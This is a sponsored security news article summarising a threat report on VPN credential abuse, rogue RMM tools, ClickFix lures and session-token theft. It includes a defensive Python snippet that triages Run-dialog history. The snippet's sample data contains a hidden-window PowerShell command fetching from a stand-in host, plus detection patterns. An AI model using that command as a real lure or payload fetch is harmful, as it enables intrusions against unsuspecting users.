Routine Access Is Powering Modern Intrusions, a New Threat Report Finds
Published 2026-4-1 14:18:4 · Author: www.bleepingcomputer.com (view original)


Remote access and trusted administrative tools play a central role in how organizations operate today. According to Blackpoint Cyber’s 2026 Annual Threat Report, they are also increasingly central to how intrusions begin.

Informed by analysis of thousands of security investigations conducted during the reporting period, the report highlights a shift in attacker behavior. Rather than relying primarily on vulnerability exploitation, threat actors frequently gained access by using valid credentials, legitimate tools, and routine user-driven actions.

The report examines these patterns, documents where intrusion activity was disrupted, and presents defensive priorities derived from analyzed incident response outcomes observed throughout 2025.

Additional data and incident walkthroughs will be covered during an upcoming live webinar hosted by Blackpoint Cyber.

➡️ Register here

Key Findings From the 2026 Annual Threat Report

Attackers Are Entering Through Legitimate Access Paths

Across incidents analyzed in the report, attackers were more likely to log in using legitimate access than to exploit vulnerabilities as their primary entry point.

SSL VPN abuse accounted for 32.8 percent of all identifiable incidents, making it one of the most common initial access vectors. In many cases, threat actors authenticated using valid but compromised credentials, resulting in VPN sessions that appeared legitimate to security controls.

Once access was established, these sessions often provided broad internal reach, allowing attackers to move rapidly toward high-value systems without immediately triggering alerts.

Trusted IT Tools Are Being Used Against Organizations

The report also documents frequent abuse of legitimate Remote Monitoring and Management tools as a method of access and persistence.

RMM abuse appeared in 30.3 percent of identifiable incidents, with ScreenConnect present in more than 70 percent of rogue RMM cases. Because these tools are commonly used for standard IT administration, unauthorized installations often resembled expected activity and were difficult to distinguish without strong visibility.

The report notes that environments with multiple remote access tools in use were more likely to see rogue instances blend in with existing tooling.

Social Engineering, Not Exploits, Drove the Majority of Incidents

While legitimate access paths enabled many intrusions, user interaction represented the largest driver of overall incident volume.

Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents, making them the most common attack pattern documented in the report.

Rather than exploiting software vulnerabilities, these campaigns relied on deceptive prompts. Users were instructed to paste commands into the Windows Run dialog as part of what appeared to be a routine verification step. Execution used built-in Windows tools, without traditional malware downloads or exploit activity.
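One way to triage this pattern on an endpoint, as an added example rather than anything from the report: Explorer records what a user typed into the Run dialog under the RunMRU registry key, so a defender can parse an export of that key and flag entries that have the shape of a pasted "verification" command (a script interpreter plus a URL or a hidden-window/encoded flag). The key path and the trailing `\1` value format are the standard Windows artifact; the sample export, the interpreter list and the heuristics are this example's own assumptions.

```python
import re

# Constructed sample of the RunMRU key in .reg export form (not data from the
# report). Each lettered value holds "<command>\1"; MRUList orders the letters,
# most recent first.
SAMPLE_RUNMRU = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -nop -c \"(Invoke-WebRequest https://captcha.example.invalid/verify).Content\"\\1"
"c"="cmd\\1"
"MRUList"="bca"
'''

# Assumed list of interpreters a paste-to-verify lure would launch.
INTERPRETERS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript")
URL_RE = re.compile(r"https?://", re.I)
# Hidden console or encoded command: rare for a human typing into Run.
STEALTH_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s", re.I)


def _unescape_reg(value: str) -> str:
    # .reg files escape backslash and double quote with a leading backslash.
    return re.sub(r"\\(.)", r"\1", value)


def parse_runmru(reg_text: str) -> list[str]:
    """Return Run-dialog commands ordered most recent first."""
    values: dict[str, str] = {}
    for line in reg_text.splitlines():
        m = re.match(r'^"([^"]+)"="(.*)"\s*$', line.strip())
        if m:
            values[m.group(1)] = _unescape_reg(m.group(2))
    commands = []
    for letter in values.pop("MRUList", ""):
        cmd = values.get(letter, "")
        if cmd.endswith("\\1"):  # strip the trailing \1 marker
            cmd = cmd[:-2]
        if cmd:
            commands.append(cmd)
    return commands


def suspicious_reasons(cmd: str) -> list[str]:
    """Heuristic: interpreter launched from Run plus a URL or stealth flag."""
    parts = cmd.split()
    if not parts:
        return []
    exe = parts[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
    if exe not in INTERPRETERS:
        return []
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("url")
    if STEALTH_RE.search(cmd):
        reasons.append("hidden-or-encoded")
    return reasons


def triage(reg_text: str) -> list[dict]:
    return [{"command": c, "reasons": r}
            for c in parse_runmru(reg_text) if (r := suspicious_reasons(c))]
```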

Cloud Intrusions Focused on Session Reuse After MFA

Multi-factor authentication was enabled in many cloud environments associated with investigated incidents, yet account compromise still occurred.

Adversary-in-the-Middle phishing accounted for approximately 16 percent of cloud account disable events documented in the report. In these scenarios, MFA functioned as designed. Instead of bypassing authentication, attackers captured authenticated session tokens issued after successful MFA and reused them to access cloud services.

From the perspective of the cloud platform, this activity aligned with a legitimate authenticated session.

From Initial Access to Network Pivoting

Many of the attacks described above begin with legitimate access. What happens next is where real damage occurs.

In a recent investigation, our SOC identified a new implant called Roadk1ll, designed to pivot across systems using WebSocket-based communication and maintain access while blending into network traffic.

Join Inside the SOC Episode #002 to see how these attacks progress from initial access to full environment compromise.

Save your seat

What These Findings Mean for Security Teams

Across industries, environments, and attack types, the report highlights a consistent pattern: many successful intrusions relied on activity that blended into normal operations.

Rather than relying on novel exploits or advanced malware, attackers abused everyday workflows such as remote logins, trusted tools, and standard user actions. Based on the attack chains analyzed, the report identifies several defensive priorities:

  • Treat remote access as high-risk, high-impact activity
  • Maintain a complete inventory of approved RMM tools and remove unused or legacy agents
  • Restrict unapproved software installations and limit execution from user-writable directories
  • Apply Conditional Access controls that evaluate device posture, location, and session risk

These patterns were documented across frequently targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.

For teams interested in examining how these intrusion patterns unfold, Blackpoint Cyber will review key findings, case examples, and defensive takeaways from the 2026 Annual Threat Report during an upcoming live webinar.

➡️ Register to receive the 2026 Annual Threat Report

Sponsored and written by Blackpoint Cyber.


Source: https://www.bleepingcomputer.com/news/security/routine-access-is-powering-modern-intrusions-a-new-threat-report-finds/